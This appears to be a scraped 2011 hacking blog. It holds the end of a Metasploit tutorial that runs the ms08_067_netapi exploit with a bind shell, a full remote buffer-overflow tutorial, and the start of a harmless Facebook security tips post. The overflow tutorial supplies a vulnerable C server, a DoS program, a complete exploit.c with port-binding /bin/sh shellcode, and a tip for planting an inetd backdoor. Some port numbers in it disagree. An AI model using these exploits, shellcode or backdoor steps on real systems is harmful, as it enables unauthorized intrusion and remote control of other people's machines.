to tell you the operating system of the target machine, this will also
come to play when selecting an exploit. The -n command tells nmap to not
run a -Pn or ping scan against the target as they get logged, and since
you have already done that once you wouldn't want to do it again.<br />
And again the -v command runs nmap in verbose mode which allows you to
see more of what's going on behind the scenes and helps you better
understand what is happening.<br /><br />
Now once you have a list of open ports you can begin to choose your
exploit based on port and operating system. For this exercise I chose
the windows/smb/ms08_067_netapi exploit.</b>
<b><br /><br />
Now since port 445 is open I will attempt to run the ms08_067_netapi
exploit against the target. So with metasploit open we will run</b>
<b><br /></b>
</span>
<div class="codeblock" style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<div class="title">
<span style="font-size: small;"><b>Code:</b></span>
</div>
<div class="body" dir="ltr">
<span style="font-size: small;"><b><code>use windows/smb/ms08_067_netapi <br />
set payload windows/bind_tcp<br />
set rhost 192.168.1.4<br />
set lhost 192.168.1.3<br />
set lport 5150<br />
check</code></b></span></div>
</div>
<span style="color: #666666; font-family: Arial,Helvetica,sans-serif; font-size: small;"><b>
NOTE: Run the show options command to display what information is required for the exploit to work properly.<br /><br />
<a href="http://img684.imageshack.us/i/metasploit4.png/" target="_blank"><img alt="[Image: metasploit4.png]" border="0" src="http://img684.imageshack.us/img684/1811/metasploit4.png" /></a></b>
<b><br /><br />
Now these commands in metasploit will first set the exploit to use as the windows/smb/ms08_067_netapi exploit.</b>
<b><br />
The second sets metasploit to use a bind shell using the tcp protocol.<br />
<br />
<br /><br />
The third sets the remote host to our target ip. The fourth sets the
localhost to our ip, and the local port the one we want to listen on.</b>
<b><br />
Running the check command will tell us if the target is vulnerable or not.<br /><br />
And as you can see it is. So now we will run the exploit command </b><b><br /></b>
</span>
<div class="codeblock" style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<div class="title">
<span style="font-size: small;"><b>Code:</b></span>
</div>
<div class="body" dir="ltr">
<span style="font-size: small;"><b><code>exploit</code></b></span></div>
</div>
<span style="color: #666666; font-family: Arial,Helvetica,sans-serif; font-size: small;">
<b><br />
<a href="http://img718.imageshack.us/i/metasploit5.png/" target="_blank"><img alt="[Image: metasploit5.png]" border="0" src="http://img718.imageshack.us/img718/348/metasploit5.png" /></a><br /><br />
From there meterpreter will open. You can go here for all the meterpreter commands.</b>
<b><br /><br />
<br /><br />
Now you're in.... All you need to do is to do whatever you want. LOL</b>
<b><br />
This Has been another ultra noob edition tutorial.<br /><br />
References</b>
<b><br /><br />
<a href="http://www.backtrack-linux.org/forums/backtrack-howtos/28933-metasploit-db_autopwn-using-postgresql.html" target="_blank">http://www.backtrack-linux.org/forums/ba...resql.html</a></b>
<b><br /><br />
<a href="http://hackforums.net/showthread.php?tid=970352" target="_blank">http://hackforums.net/showthread.php?tid=970352</a></b>
<b><br /><br />
If I missed a ref or something let me know. I will fix it immediately.</b>
<b><br /><br />
P.S. Will be adding things and command explanations as necessary; just P.M. me for any help or explanations.</b>
<b><br /><br />
Also would very much appreciate feedback on what I could improve within the tut and whether or not it was enjoyed/helpful. </b><b><br /><br />
<br /><br />
<br />
P.S.S. Am still making the cracking WPA with aircrack tutorial....
pretty much was just too lazy to do it recently as i am going to be a
father... :)</b>
<b><br /></b>
</span>
<hr style="color: #666666; font-family: Arial,Helvetica,sans-serif;" />
<span style="color: #666666; font-family: Arial,Helvetica,sans-serif; font-size: small;"><b>
Really? no feedback or anything about this post? That's disappointing.. if
I can't get more than a single thank you I might as well stop making
tuts
</b></span></div>
How to write remote exploits ( V. 1.1) (posted by Indian4994, 2011-09-28)<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>I hope you'll enjoy it. OK, what are we going to do? We want to exploit a vulnerable server program (vulnerable.c) and get a remote shell. If you are looking for an exercise, read the vulnerable.c program, compile it and try to exploit it. If you don't have any clue about remote exploits… well, then read on. First we take a look at the vulnerable program, then at its functions, then at how an overflow within the program can be abused, then we define the general structure of the exploit code, and finally we write an exploit…<br /><br />-------------------------------------------- vulnerable.c ----------------------------------------------<br /><br />#include <stdio.h><br />#include <stdlib.h><br />#include <string.h><br />#include <unistd.h><br />#include <netdb.h><br />#include <netinet/in.h><br />#include <sys/socket.h><br />#include <arpa/inet.h><br /><br />#define BUFFER_SIZE 1024<br />#define NAME_SIZE 2048<br /><br />int handling(int c)<br />{<br />char buffer[BUFFER_SIZE], name[NAME_SIZE];<br />int bytes;<br />strcpy(buffer, "My name is: ");<br />bytes = send(c, buffer, strlen(buffer), 0);<br />if (bytes == -1)<br />return -1;<br />bytes = recv(c, name, sizeof(name), 0);<br />if (bytes == -1)<br />return -1;<br />name[bytes - 1] = '\0';<br />/* the bug: a name of up to 2048 bytes is formatted into a 1024-byte buffer */<br />sprintf(buffer, "Hello %s, nice to meet you!\r\n", name);<br />bytes = send(c, buffer, strlen(buffer), 0);<br />if (bytes == -1)<br />return -1;<br />return 0;<br />}<br /><br />int main(int argc, char *argv[])<br />{<br />int s, c;<br />socklen_t cli_size;<br />struct sockaddr_in srv, cli;<br />if (argc != 2)<br />{<br />fprintf(stderr, "usage: %s port\n", argv[0]);<br />return 1;<br />}<br />s = socket(AF_INET, SOCK_STREAM, 0);<br />if (s == -1)<br />{<br />perror("socket() failed");<br />return 2;<br />}<br />srv.sin_addr.s_addr = INADDR_ANY;<br />srv.sin_port = htons( (unsigned short int) atol(argv[1]));<br />srv.sin_family = AF_INET;<br />if (bind(s, (struct sockaddr *) &srv, sizeof(srv)) == -1)<br />{<br />perror("bind() failed");<br />return 3;<br />}<br />if (listen(s, 3) == -1)<br />{<br />perror("listen() failed");<br />return 4;<br />}<br />for(;;)<br />{<br />cli_size = sizeof(cli);<br />c = accept(s, (struct sockaddr *) &cli, &cli_size);<br />if (c == -1)<br />{<br />perror("accept() failed");<br />return 5;<br />}<br />printf("client from %s", inet_ntoa(cli.sin_addr));<br />if (handling(c) == -1)<br />fprintf(stderr, "%s: handling() failed", argv[0]);<br />close(c);<br />}<br />return 0;<br />}<br /><br />---------------------------------------------- EOF------------------------------------------------------<br /><br />Here's how you compile and use the program.<br /><br />user@linux:~/ > gcc vulnerable.c -o vulnerable<br /><br />user@linux:~/ > ./vulnerable 8080<br /><br />./vulnerable 8080 runs the service on port 8080. Choose whichever port you like, but you can't use a privileged port (1 – 1024) unless you are root.<br /><br />Now we've compiled the program and we know how to run it, with the parameter<br /><br />program <port><br /><br />Now we want to check some addresses of the program and take a look at how it is built. We start the vulnerable program under gdb to look at a few things…<br /><br />Now do the following:<br /><br />user@linux~/ > gdb vulnerable<br /><br />GNU gdb 4.18<br /><br />Copyright 1998 Free Software Foundation, Inc.<br /><br />GDB is free software, covered by the GNU General Public License, and you are<br /><br />welcome to change it and/or distribute copies of it under certain conditions.<br /><br />Type "show copying" to see the conditions.<br /><br />There is absolutely no warranty for GDB. 
Type "show warranty" for details.<br /><br />This GDB was configured as "i386-suse-linux"...<br /><br />(gdb) run 8080<br /><br />Starting program: /home/user/directory/vulnerable 8080<br /><br />Now the program is listening for an incoming connection on port 8080.<br /><br />Next, connect with telnet or netcat on port 8080.<br /><br />user@linux:~/ > telnet localhost 8080<br /><br />Trying ::1...<br /><br />telnet: connect to address ::1: Connection refused<br /><br />Trying 127.0.0.1...<br /><br />Connected to localhost.<br /><br />Escape character is '^]'.<br /><br />My name is: Robin<br /><br />, nice to meet you!<br /><br />Connection closed by foreign host.<br /><br />user@linux:~/ ><br /><br />This simple server does nothing more than read a name and write it back to your screen… OK, let's go further…<br /><br />While you did this, gdb (the debugger) wrote the following on the screen:<br /><br />client from 127.0.0.1 0xbffff28c<br /><br />/* Don't be confused if the address is different on your computer; on my box it is 0xbffff28c */<br /><br />OK, the server is still running because of the for loop; it keeps accepting connections until you kill the server program.<br /><br />3. Overflowing the server program<br /><br />Let's test something....<br /><br />Now we reconnect to the service on port 8080 and send more than 1024 characters in reply to the prompt "My name is:..."<br /><br />It should look like this... 
(I'll take A's *g*)...<br /><br />user@linux:~/ > telnet localhost 8080<br /><br />Trying ::1...<br /><br />telnet: connect to address ::1: Connection refused<br /><br />Trying 127.0.0.1...<br /><br />Connected to localhost.<br /><br />Escape character is '^]'.<br /><br />My name is: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br /><br />Now the telnet client should be disconnected... but why? Let's look at the output of gdb:<br /><br />Program received signal SIGSEGV, Segmentation fault.<br /><br />0x41414141 in ?? ()<br /><br />(gdb)<br /><br />// Don’t close gdb !!<br /><br />What happened? As we can see, the eip is set to 0x41414141, probably you are asking why?<br /><br />OK, I’ll try to explain it. 0x41 stands for an ‘A’... as we put over 1024 bytes in, the program has tried to copy the string name[2048] into<br /><br />buffer[1024].... 
so because the string in name[2048] was larger than 1024 bytes, the name has overrun the buffer<br /><br />and also overwritten the saved eip (extended instruction pointer; this is where the return address is stored), so our buffer<br /><br />looks like this:<br /><br />[xxxxxxxx-name-2048-bytes-xxxxxxxxxx]<br /><br />[xxxxx buffer-only-1024-bytes xxx] [EIP]<br /><br />Ok, this is what our stack should look like. We've tried to put more than 1024 bytes into buffer, and so we've overwritten the eip *g*.<br /><br />// don't forget: eip has a size of 4 bytes!<br /><br />After the whole return address was overwritten, the function wanted to return to main, but jumped to the<br /><br />wrong address (0x41414141) instead, and so there was a segmentation fault.<br /><br />Now here's a DoS tool for this program:<br /><br />------------------------------------- dos.c ------------------------------------------------------------<br /><br />#include <stdio.h><br /><br />#include <netinet/in.h><br /><br />#include <sys/socket.h><br /><br />#include <sys/types.h><br /><br />#include <netdb.h><br /><br />int main(int argc, char **argv)<br /><br />{<br /><br />struct sockaddr_in addr;<br /><br />struct hostent *host;<br /><br />char buffer[2048];<br /><br />int s, i;<br /><br />if(argc != 3)<br /><br />{<br /><br />fprintf(stderr, "usage: %s <host> <port>\n", argv[0]);<br /><br />exit(0);<br /><br />}<br /><br />s = socket(AF_INET, SOCK_STREAM, 0);<br /><br />if(s == -1)<br /><br />{<br /><br />perror("socket() failed\n");<br /><br />exit(0);<br /><br />}<br /><br />host = gethostbyname(argv[1]);<br /><br />if( host == NULL)<br /><br />{<br /><br />herror("gethostbyname() failed");<br /><br />exit(0);<br /><br />}<br /><br />addr.sin_addr = *(struct in_addr*)host->h_addr;<br /><br />addr.sin_family = AF_INET;<br /><br />addr.sin_port = htons(atol(argv[2]));<br /><br />if(connect(s, &addr, sizeof(addr)) == -1)<br /><br />{<br /><br />perror("couldn't connect to server\n");<br /><br />exit(0);<br /><br />}<br /><br />/* Not difficult: only filling buffer with A's, then sending nothing more */<br /><br />for(i = 0; i < 2048 ; i++)<br /><br />buffer[i] = 'A';<br /><br />printf("buffer is: %s\n", buffer);<br /><br />printf("buffer filled... now sending buffer\n");<br /><br />send(s, buffer, strlen(buffer), 0);<br /><br />printf("buffer sent.\n");<br /><br />close(s);<br /><br />return 0;<br /><br />}<br /><br />--------------------------------------------- EOF ------------------------------------------------------<br /><br />4. Finding the return address<br /><br />I only want to show you what the structure of a remote exploit looks like, so let's find out what we are going to do:<br /><br />First we open gdb and search for the esp (I hope you didn't close gdb). After getting a SEGFAULT, type x/200bx $esp-200 into gdb, and you should get an output of addresses. 
It should look like this:<br /><br />(gdb) x/200bx $esp-200<br /><br />0xbffff5cc: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41<br /><br />0xbffff5d4: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41<br /><br />0xbffff5dc: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41<br /><br />0xbffff5e4: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41<br /><br />0xbffff5ec: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41<br /><br />0xbffff5f4: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41<br /><br />0xbffff5fc: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41<br /><br />0xbffff604: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41<br /><br />0xbffff60c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41<br /><br />0xbffff614: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41<br /><br />0xbffff61c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41<br /><br />0xbffff624: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41<br /><br />0xbffff62c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41<br /><br />0xbffff634: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41<br /><br />0xbffff63c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41<br /><br />0xbffff644: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41<br /><br />0xbffff64c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41<br /><br />0xbffff654: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41<br /><br />0xbffff65c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41<br /><br />0xbffff664: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41<br /><br />0xbffff66c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41<br /><br />0xbffff674: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41<br /><br />0xbffff67c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41<br /><br />---Type <return> to continue, or q <return> to quit---<br /><br />Ok, now we know that we've overwritten the whole buffer, so let's take one of those addresses. I'll show you later<br /><br />why (because we want to guess the address). Maybe you know the NOP technique, so it shouldn't be any problem to<br /><br />make our exploit work as well, 
or to make our chance of guessing the return address bigger.<br /><br />Attention: don't take the address nearest the end of the 0x41s, take an address from the middle; we'll fill that area with NOPs later.<br /><br />5. Structure of the exploit code<br /><br />So we've got a possible return address, let's try to use it. The exploit code should be structured like this:<br /><br />1. First find the esp... ok, we've got it (ok, we've got an address near the esp; that isn't a problem, because we'll fill the buffer with NOPs). Then you should find a good shellcode which binds a shell on a port. Don't forget: in remote exploits we can't use local exploit shellcodes... ok, we could, but it isn't very clever. So we have to find another way to get a shell. What about a portbinder shellcode, which binds a shell on a port?<br /><br />Ok, on the net there are many of these portbinder shellcodes, e.g. on www.hack.co.za or my page *g*.<br /><br />2. Declare a buffer which is bigger than 1024 bytes... let's make it 1064 bytes, so there is no problem overwriting eip. Don't forget: you only have to declare a buffer which is greater than 1024 bytes.<br /><br />3. Let's prepare the buffer. First fill the whole buffer with NOPs:<br /><br />memset(buffer, 0x90, 1064);<br /><br />4. Let's copy the shellcode into the buffer:<br /><br />memcpy(buffer+1001-sizeof(shellcode), shellcode, sizeof(shellcode));<br /><br />Here we put the shellcode in the middle of the buffer.<br /><br />Why? Ok, if we have enough NOPs at the beginning, our chance of executing the shellcode gets better.<br /><br />5. Let's get rid of the null byte in the buffer (the memcpy above copied the shellcode's terminating \0 to buffer[1000]):<br /><br />buffer[1000] = 0x90; // 0x90 is the NOP in hexadecimal<br /><br />6. Let's copy the return address to the end of the buffer:<br /><br />for(i = 1022; i < 1059; i+=4)<br /><br />{<br /><br />*((int *) &buffer[i]) = RET;<br /><br />// RET is the return address we want to use, see the 
#define in the header<br /><br />}<br /><br />We know that the buffer ends at 1024 bytes, but to be sure we begin at 1022 and copy the return address until we've reached 1059 bytes. That is enough because we've already overwritten the eip (we hope so *g*).<br /><br />7. Let's add a \0 null byte at the end of our prepared buffer:<br /><br />buffer[1063] = 0x0;<br /><br />Now we've prepared our buffer; we only need to send it to the vulnerable host, by host or IP and port.<br /><br />-------------------------------------------- exploit.c --------------------------------------------------<br /><br />/* Simple remote exploit, which binds a shell on port 3789<br /><br />* by triton<br /><br />*<br /><br />* After the return address was overwritten, you can connect<br /><br />* with telnet or netcat to the victim host on port 3789<br /><br />* After you've logged in there's nothing, but try to enter "id;" (don't forget the semicolon)<br /><br />* You should get an output; ok, you've got a shell *g*. 
Always use:<br /><br />*<br /><br />* <command>;<br /><br />*<br /><br />* execute.<br /><br />*/<br /><br />#include <stdio.h><br /><br />#include <netdb.h><br /><br />#include <netinet/in.h><br /><br />//Portbinding Shellcode<br /><br />char shellcode[] =<br /><br />"\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"<br /><br />"\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"<br /><br />"\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0"<br /><br />"\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"<br /><br />"\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"<br /><br />"\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75"<br /><br />"\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"<br /><br />"\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";<br /><br />//standard offset (probably must be modified)<br /><br />#define RET 0xbffff5ec<br /><br /><br /><br />int main(int argc, char *argv[]) {<br /><br />char buffer[1064];<br /><br />int s, i, size;<br /><br />struct sockaddr_in remote;<br /><br />struct hostent *host;<br /><br />if(argc != 3) {<br /><br />printf("Usage: %s target-ip port\n", argv[0]);<br /><br />return -1;<br /><br />}<br /><br />// filling buffer with NOPs<br /><br />memset(buffer, 0x90, 1064);<br /><br />//copying shellcode into buffer<br /><br />memcpy(buffer+1001-sizeof(shellcode) , shellcode, sizeof(shellcode));<br /><br />// the previous statement causes a unintential Nullbyte at buffer[1000]<br /><br />buffer[1000] = 0x90;<br /><br />// Copying the return address multiple times at the end of the buffer...<br /><br />for(i=1022; i < 1059; i+=4) {<br /><br />* ((int *) &buffer[i]) = RET;<br /><br />}<br /><br />buffer[1063] = 0x0;<br /><br />//getting hostname<br /><br />host=gethostbyname(argv[1]);<br /><br />if (host==NULL)<br /><br />{<br /><br />fprintf(stderr, "Unknown Host %s\n",argv[1]);<br /><br />return -1;<br /><br />}<br 
/><br />// creating socket...<br /><br />s = socket(AF_INET, SOCK_STREAM, 0);<br /><br />if (s < 0)<br /><br />{<br /><br />fprintf(stderr, "Error: Socket\n");<br /><br />return -1;<br /><br />}<br /><br />// set the protocol family, then convert the hostname or IP address, and get the port number<br /><br />remote.sin_family = AF_INET;<br /><br />remote.sin_addr = *((struct in_addr *)host->h_addr);<br /><br />remote.sin_port = htons(atoi(argv[2]));<br /><br />// connecting to the destination host<br /><br />if (connect(s, (struct sockaddr *)&remote, sizeof(remote))==-1)<br /><br />{<br /><br />close(s);<br /><br />fprintf(stderr, "Error: connect\n");<br /><br />return -1;<br /><br />}<br /><br />// sending exploit string<br /><br />size = send(s, buffer, sizeof(buffer), 0);<br /><br />if (size==-1)<br /><br />{<br /><br />close(s);<br /><br />fprintf(stderr, "sending data failed\n");<br /><br />return -1;<br /><br />}<br /><br />// closing socket<br /><br />close(s);<br /><br />}<br /><br />--------------------------------------------- EOF-------------------------------------------------------<br /><br />7. Using the exploit<br /><br />user@linux~/ > gcc exploit.c -o exploit<br /><br />user@linux~/ > ./exploit <host> <port><br /><br />Now it should work, if you got the right return address... or one of the right return addresses.<br /><br />user@linux~/ > telnet <host> 3879<br /><br />If you're connected then try this:<br /><br />id;<br /><br />uid=500(user) gid=500(user) groups=500(user)<br /><br />As you can see, it works very well.<br /><br />8. 
Getting root privileges<br /><br />Do the following:<br /><br />user@linux~/ > su<br /><br />password: ******<br /><br />root@linux~/ > ls -ln vulnerable<br /><br />-rwxrwxr-x 1 500 500 14106 Jun 18 14:12 vulnerable<br /><br />root@linux~/ > chown root vulnerable<br /><br />root@linux~/ > chmod 6755 vulnerable<br /><br />root@linux~/ > ./vulnerable <port><br /><br />Now you can exploit the server program, and you should get a root shell *g*<br /><br />9. Entering the service in inetd.conf<br /><br />Ok, we're interested in how the program would behave if it were a daemon. Now do the following:<br /><br />First copy the vulnerable program to /usr/bin/<br /><br />root@linux~/ > cp vulnerable /usr/bin/vulnerable<br /><br />Now let's modify some files...<br /><br />root@linux~/ > vi /etc/services<br /><br />(Feel free to use your favourite editor instead of vi)<br /><br />Define a port you want to use. I'll take port 1526; now let's enter this information into /etc/services:<br /><br />vulnerable 1526/tcp # defining port for our server program, save and quit<br /><br />Now edit the inetd.conf file<br /><br />root@linux~/ > vi /etc/inetd.conf<br /><br />put in:<br /><br />vulnerable stream tcp nowait root /usr/bin/vulnerable vulnerable 1526<br /><br />Now save the inetd.conf file and quit.<br /><br />root@linux~/ > killall -HUP inetd<br /><br />Now inetd has been restarted and everything should work.<br /><br />Note: This is also a good way to make a backdoor: add a service in /etc/services, then add the entry in inetd.conf and write /bin/sh sh -i or sh -h *g*....<br /><br />9. 
Problem solutions<br /><br />If the exploit doesn't work, think about the return address; it could be wrong, so test it with gdb:<br /><br />user@linux~/ > gdb vulnerable<br /><br />.....<br /><br />(gdb) run <port><br /><br />Now you can exploit the program. If it doesn't work, look at the output of gdb and try to find out the address, as in Chapter 4.<br /><br />If there are any other problems... read the remarks *g*.<br /><br />10. Remarks<br /><br />If you find a bug, please mail me, so I can correct the current version. If you want to criticize my English, I'll delete your message :-) *nobody's perfect*, but if you really have problems understanding this, please ask me... But please do not tease me with stupid questions, I don't have the time to answer every question.<br /><br />If you want to put this text on your page, no problem, but please do not change the copyright or other things....<br /><br />11. Greets<br /><br />Thanks to Maverick for the vulnerable program *hehe* (in his tutorial "Socket Programming"),<br /><br />thanks to triton for the exploit code (great man, also member of buha-security.de)<br /><br />Greets to all members of buha-security.de and greets to XaitaX, cat, Anthraxx, Jess (I wonder what happened with her), DrDoo (knuff)<br /><br />and of course one of my best friends Richard Hirner (well, I've known him for 1,2 years, but we haven't met.... *g*..)... and last but not least greets to all apprentices of LGT Bank in Liechtenstein, special greets to Marc, Etienne, Martina... (Toni from Hospital too, my own apprentice)<br /><br /></b></span></div>
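As an added example, not the tutorial's or its author's code: the bounded copy a defender would write in place of the unbounded name-to-buffer copy that section 3 describes, with the length check the server lacks. The function names, the 2048/1024 sizes and the reply format are assumptions taken from the tutorial's description; the inputs are constructed (a normal telnet line and a long run of 'A's).

```c
/* Added example, not the tutorial's code: the bounded version of the
 * name-to-buffer copy described in section 3.  Names, sizes and the reply
 * format are assumptions based on the tutorial's text. */
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define NAME_MAX 2048   /* size the tutorial's server reads the name into */
#define BUF_MAX  1024   /* size of the smaller buffer it copies into */

/* Returns 1 if name_len bytes plus a terminator do not fit in buf_size
 * bytes.  This is exactly the check the unbounded copy lacks: 2048 'A's
 * into a 1024-byte buffer run past it and over the saved return address. */
int name_overflows(size_t name_len, size_t buf_size)
{
    return name_len + 1 > buf_size;
}

/* Bounded copy: rejects oversized input instead of truncating silently
 * and always leaves dst NUL-terminated.  Returns 0 on success, -1 if the
 * input does not fit (the caller should drop the client, not the bytes). */
int copy_name_bounded(char *dst, size_t dst_size,
                      const char *src, size_t src_len)
{
    if (dst_size == 0 || name_overflows(src_len, dst_size))
        return -1;
    memcpy(dst, src, src_len);
    dst[src_len] = '\0';
    return 0;
}

/* Drop the trailing CR/LF a telnet client sends after the name. */
static size_t trim_line(const char *s, size_t len)
{
    while (len > 0 && (s[len - 1] == '\n' || s[len - 1] == '\r'))
        len--;
    return len;
}

/* Hardened per-client step: takes the raw received bytes (in, in_len,
 * possibly without a terminator), builds the reply in out and returns its
 * length, or -1 if the name was rejected or the reply would not fit.
 * snprintf never writes past out_size; its return value reveals truncation. */
int build_reply(const char *in, size_t in_len, char *out, size_t out_size)
{
    char name[BUF_MAX];
    size_t len = trim_line(in, in_len);
    int n;

    if (copy_name_bounded(name, sizeof name, in, len) != 0)
        return -1;                  /* oversized name: reject, never copy */

    n = snprintf(out, out_size, "My name is: %s, nice to meet you!", name);
    if (n < 0 || (size_t)n >= out_size)
        return -1;                  /* reply truncated: treat as failure */
    return n;
}

/* Try build_reply on a NUL-terminated line, as a client would send it. */
int reply_for_line(const char *line)
{
    char out[BUF_MAX + 64];
    return build_reply(line, strlen(line), out, sizeof out);
}

/* Try build_reply on a constructed name of n 'A' bytes (capped at NAME_MAX),
 * the same kind of input the tutorial uses to crash the server. */
int reply_for_a_run(size_t n)
{
    char in[NAME_MAX];
    char out[BUF_MAX + 64];
    if (n > sizeof in)
        n = sizeof in;
    memset(in, 'A', n);
    return build_reply(in, n, out, sizeof out);
}

int main(void)
{
    printf("\"Robin\\r\\n\" -> reply of %d bytes\n", reply_for_line("Robin\r\n"));
    printf("1023 x 'A'   -> reply of %d bytes\n", reply_for_a_run(1023));
    printf("2048 x 'A'   -> %d (rejected instead of overflowing)\n",
           reply_for_a_run(2048));
    return 0;
}
```

Building the original server with gcc's -fstack-protector-all would additionally turn the 0x41414141 crash into a detected stack-smash abort before the corrupted return address is used.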
</div>
Indian4994http://www.blogger.com/profile/14173641514901570881noreply@blogger.com0tag:blogger.com,1999:blog-3299468824600484367.post-46914106918810892402011-09-28T06:12:00.000-07:002011-09-28T06:12:50.013-07:008 Top Facebook Security Tips<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
</div>
<div style="text-align: center;">
<span style="color: blue; font-size: small;"><b>FACEBOOK TIPS</b></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQCoIjTf1eDvkp6TeEXgzyrUWvJiANoQN9kcPLdo-OZw8g2ghU18WguEScpinoG3Xw5xL-X-tWtirMhY7Nw1NkCeLa55PrmALqoqtcq-1yc32iKolPaiQNl_KJMKg5QFbu8gi2F19_Nc8/s1600/facebook-logo1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="120" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQCoIjTf1eDvkp6TeEXgzyrUWvJiANoQN9kcPLdo-OZw8g2ghU18WguEScpinoG3Xw5xL-X-tWtirMhY7Nw1NkCeLa55PrmALqoqtcq-1yc32iKolPaiQNl_KJMKg5QFbu8gi2F19_Nc8/s320/facebook-logo1.png" width="320" /></a></div>
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b><br />The World Wide Web keeps expanding, and the Internet has turned the whole world into a village. Social networks played, and still play, an important role in this. Facebook, with its large number of users, is high on the hit list of attackers and scammers. <br />While you are using Facebook or any other social networking website you need to protect your information with effective privacy practices. <br />This article talks about some security issues and their countermeasures on Facebook; most of it applies to other social networking websites as well.<br /><br /><span style="color: #073763;">Strong Passwords</span><br /><br />Take care with your passwords: make sure you have a strong password that contains capital letters, small letters, numbers and special characters. Use a different password for each online account. Your password must not be related to your personal information, and do not use words that can be found in a dictionary, since those are the first thing a dictionary attack tries.<br /><br /><span style="color: #073763;">Secure Browsing</span><br />It is good practice to keep yourself up to date: make sure you are using an updated OS and browser to avoid browser exploitation attacks, and use a secure connection (HTTPS) wherever possible to avoid sniffing.<br /><br style="color: #073763;" /><span style="color: #073763;">Computer Security</span><br />It is very important to stay secure on the web: make sure your computer does not contain keyloggers, RATs (remote administration tools), iStealer or anything else of that kind. Use a good antivirus and firewall solution to remain secure, and if you think your computer has been infected by malware, follow the procedure for removing it.<br /><br style="color: #073763;" /><span style="color: #073763;">Personal Information</span><br />Avoid putting too much information about yourself on your Facebook profile. An attacker might use this information to work out your password, or might build a dictionary from it to launch a password attack.<br /><br style="color: #073763;" /><span style="color: #073763;">Profile Privacy Settings</span><br />Make your profile as private as possible: hide your information from people you do not trust and from people who are new to you, and 